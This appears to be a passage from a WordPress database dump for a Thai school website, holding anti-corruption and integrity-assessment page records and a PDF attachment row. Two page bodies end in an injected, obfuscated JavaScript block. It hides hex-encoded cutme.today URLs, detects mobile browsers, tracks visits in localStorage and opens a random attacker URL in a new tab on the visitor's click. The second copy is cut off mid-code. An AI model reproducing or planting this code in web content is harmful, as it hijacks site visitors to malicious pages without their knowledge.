{\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"357ff8-b0\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab357ff8-b0\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_363bba-05\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_363bba-05 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_c0e085-63\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_c0e085-63\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_29fead-8e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_29fead-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"77d9b7-d1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab77d9b7-d1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_c6c267-89\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_c6c267-89 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_64d6b5-67\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_64d6b5-67\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_106c4d-48\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_106c4d-48\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ITA ONLINE 2025','','inherit','closed','closed','','871-revision-v1','','','2025-07-01 09:24:13','2025-07-01 02:24:13','',871,'http://pakhaeng.ssk.in.th/?p=1496',0,'revision','',0),
(1497,1,'2025-07-01 09:25:53','2025-07-01 02:25:53','','การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน','','inherit','','closed','','%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b9%80%e0%b8%aa%e0%b8%b5%e0%b9%88%e0%b8%a2%e0%b8%87%e0%b8%81%e0%b8%b2-2','','','2025-07-01 09:25:53','2025-07-01 02:25:53','',1032,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน.pdf',0,'attachment','application/pdf',0),
(1498,1,'2025-07-01 09:25:59','2025-07-01 02:25:59','<!-- wp:file {\"id\":1497,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน\"></object><a id=\"wp-block-file--media-163fd88a-2892-4102-9f31-5f5f9ba02002\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-163fd88a-2892-4102-9f31-5f5f9ba02002\">Download</a></div>\n<!-- /wp:file -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const 